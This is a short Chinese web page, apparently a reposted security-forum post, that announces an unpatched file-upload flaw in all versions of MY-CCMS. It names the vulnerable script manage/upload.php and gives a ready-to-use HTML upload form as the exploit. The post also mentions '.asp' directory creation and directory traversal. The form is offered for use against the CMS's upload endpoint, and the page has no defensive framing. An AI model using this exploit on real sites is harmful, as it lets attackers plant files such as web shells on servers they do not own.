漏洞 位于:manage/upload.php (代码省) 下载 (22.49 KB) 4 小时前
也可以新建“. asp ”目录,还有跳目录漏洞等
EXP:
<form id="frmUpload" enctype="multipart/form-data" action=" http://chemlg测试数据/manage/upload.php " method="post">上传除了php以外的文件于根目录:<br> <input type="file" name="Filedata" size="50"><br> <input id="Filedata" type="submit" value="Upload"> </form>
首发:俺是农村的 tools
查看更多关于MY-CCMS All Ver File Upload 0day - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11122